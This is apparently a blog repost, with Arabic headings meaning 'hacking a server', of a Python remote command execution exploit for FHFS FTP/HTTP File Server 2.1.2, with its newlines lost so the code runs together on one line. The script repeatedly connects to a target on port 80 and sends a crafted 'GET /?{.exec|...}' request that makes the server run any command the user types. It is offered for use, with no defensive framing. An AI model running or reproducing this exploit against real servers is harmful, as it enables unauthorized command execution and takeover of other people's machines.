FHFS - FTP/HTTP File Server 2.1.2 Remote Exploit
اختراق سورفر
FHFS - FTP/HTTP SERVER 2.1.2
REMOTE COMMAND EXECUTION EXPLOIT
Exploit:
#!/usr/bin/python## FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution## Author: Naser Farhadi## Date: 26 August 2015 # Version: 2.1.2 # Tested on: Windows 7 SP1 (32 bit)### Description : FHFS is a FTP and HTTP Web Server package,# transparently based on HFS and FileZilla. FHFS is built to act as an all-in-one user-based file hosting website,# good for schools, businesses, etc. whose students/employees need to easily transport files. # Usage:# chmod +x FHFS.py# ./FHFS.py## import socket url = raw_input("Enter URL : ")try: while True: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((url, 80)) cmd = raw_input("Enter command (E.g. calc) or press Ctrl+C to exit : ") req = "GET /?{.exec|"+cmd+".}" req += " HTTP/1.1\r\n\r\n" sock.send(req) sock.close() print "Done!"except KeyboardInterrupt: print "Bye!"
ليست هناك تعليقات:
إرسال تعليق